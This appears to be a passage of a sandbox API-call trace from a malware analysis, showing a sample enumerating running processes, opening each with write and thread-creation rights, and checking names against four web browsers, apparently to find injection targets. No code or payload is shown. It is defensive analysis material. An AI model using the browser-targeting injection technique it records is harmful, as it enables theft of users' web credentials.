	[0245.631] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.632] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x9330
	[0245.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.632] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.632] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.632] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.633] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.633] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0245.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x9334
	[0245.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.634] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0245.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.634] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.634] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0245.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.635] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.635] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.636] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x9338
	[0245.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.636] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.636] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.637] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.637] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0245.638] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x933c
	[0245.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.638] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.639] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.640] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.640] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0245.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9340
	[0245.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.641] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0245.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.642] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.642] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0245.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.643] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.643] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0245.644] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9344
	[0245.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.644] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0245.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.644] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.645] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0245.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.645] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.645] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0245.646] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9348
	[0245.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.646] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0245.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.646] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.647] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0245.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.647] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.647] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0245.648] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x934c
	[0245.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.648] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0245.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.648] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.649] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0245.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.649] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0245.650] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9350
	[0245.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.650] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0245.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.650] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.650] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0245.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.651] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0245.652] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9354
	[0245.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.652] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0245.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.652] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.652] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0245.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.653] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.653] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0245.654] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0245.654] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0245.655] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9358
	[0245.655] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.655] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0245.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.656] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.656] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0245.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.657] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.657] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0245.658] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x935c
	[0245.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.658] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0245.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.658] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.659] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0245.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.659] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.659] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0245.660] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9360
	[0245.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.660] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0245.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.660] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.661] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0245.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.661] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.661] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0245.662] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9364
	[0245.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.662] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0245.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.662] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.663] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0245.663] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.663] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.663] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0245.664] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9368
	[0245.664] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.664] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0245.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.665] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.665] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.665] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0245.666] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.666] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.666] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0245.667] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x936c
	[0245.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.667] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0245.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.667] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.667] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.667] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0245.668] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.668] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.668] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0245.669] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9370
	[0245.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.669] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0245.669] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.669] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.670] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0245.670] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.670] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.671] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0245.671] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9374
	[0245.671] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.672] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0245.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.672] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.672] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.673] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0245.673] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.673] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.673] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0245.674] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9378
	[0245.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.674] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0245.674] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.674] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.675] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0245.675] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.675] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.675] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0245.676] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x937c
	[0245.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.676] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0245.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.676] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.676] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.676] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0245.677] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.677] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.677] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0245.678] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9380
	[0245.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.678] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0245.678] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.678] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.679] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0245.679] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.679] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.679] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0245.680] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9384
	[0245.680] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.680] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0245.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.681] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.681] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.681] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0245.682] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.682] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.682] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0245.683] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9388
	[0245.683] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.683] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0245.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.684] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.684] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.684] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0245.685] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.685] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0245.686] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0245.687] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x938c
	[0245.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.687] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0245.687] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.687] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0245.688] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.688] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0245.689] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0245.689] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
